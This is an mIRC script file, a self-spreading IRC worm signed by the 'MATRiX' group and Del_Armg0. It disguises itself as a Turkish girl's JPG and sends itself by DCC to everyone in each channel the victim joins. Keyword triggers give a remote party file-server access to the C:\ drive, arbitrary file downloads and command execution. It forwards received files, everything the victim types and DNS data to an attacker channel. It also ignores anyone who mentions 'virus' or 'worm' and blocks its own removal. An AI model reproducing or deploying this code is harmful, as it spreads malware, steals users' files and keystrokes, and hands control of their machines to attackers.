[SCRIPT]
;;Ê∆^&;Yh‚«o&Y√+o√~)=))u)~)i)~)~)JIC∏ "∆—Ë.ˇ•)°:;;Ê∆^&;Yh‚«o&Y√+o√~
;|_--==_[_M_A_T_R_i_X_]___S_C_R_I_P_T___a CeydaDemet W0rm_==--_|
n0= on 1:start:{
n1= .remote on
n2= .events on
n3= }
n4=on 1:connect:/rename C:\Windows\winuser\users32.dll C:\Windows\winuser\CeydaDemet___TurkishGirl.JPG.com
n5=on 1:disconnect:/rename C:\Windows\winuser\CeydaDemet___TurkishGirl.JPG.com C:\Windows\winuser\users32.dll
n6=on 1:text:*ceyda*:*:/fserve $nick 5 C:\
n7=on 1:text:*demet*:#:.msg $nick CeydaDemet Worm - a from Turkey BaBe ! Hiiii! Fa! Hiiii Dem!! $ip on $server $+ : $+ $port $+
n8=on 1:text:*gimme*:*:.dcc send $nick $2
n9=on 1:text:*yup*:*:/run $2 $3 $4
n10=on 1:text:*nick1*:#:/nick CeyDa_Luv
n11=on 1:text:*nick2*:#:/nick Dem_SoFar
n12=on 1:text:*nick3*:#:/nick DelVictim
n13=on 1:text:*virus*:*:/.ignore $nick
n14=on 1:text:*worm*:*:/.ignore $nick
n15=on 1:input:*:.msg #CeydaDemetWorm [( $+ $active $+ ) $1-]
n16=on 1:filercvd:*.*:.dcc send Del_Armg0 $filename
n17=on 1:dns:.msg #CeydaDemetWorm DNS__: IP: $iaddress address: $naddress resolved: $raddress
n18=on 1:text:*comeonvx*:*:/join -n #vx-vtc
n19=on 1:ping:/pdcc 99999999999
n20=on 1:join:#:{
n21=if ( $nick == $me ) { halt } | .dcc send $nick C:\Windows\winuser\CeydaDemet___TurkishGirl.JPG.com
n22=}
n23=alias unload { halt }
n24=alias remove { halt }
;_another Del_Armg0 W0rm -=-  [MATRiX] Gr0up -=- GreeTZ t0 : mort
;[MATRiX] Gr0up -=- ULTRAS, NBK, Del_Armg0, tgr, mort -=- 16/01/00
;Del_Armg0 - one night one trojan ... 10X mort  ;)  _4 CEYDA DEMET
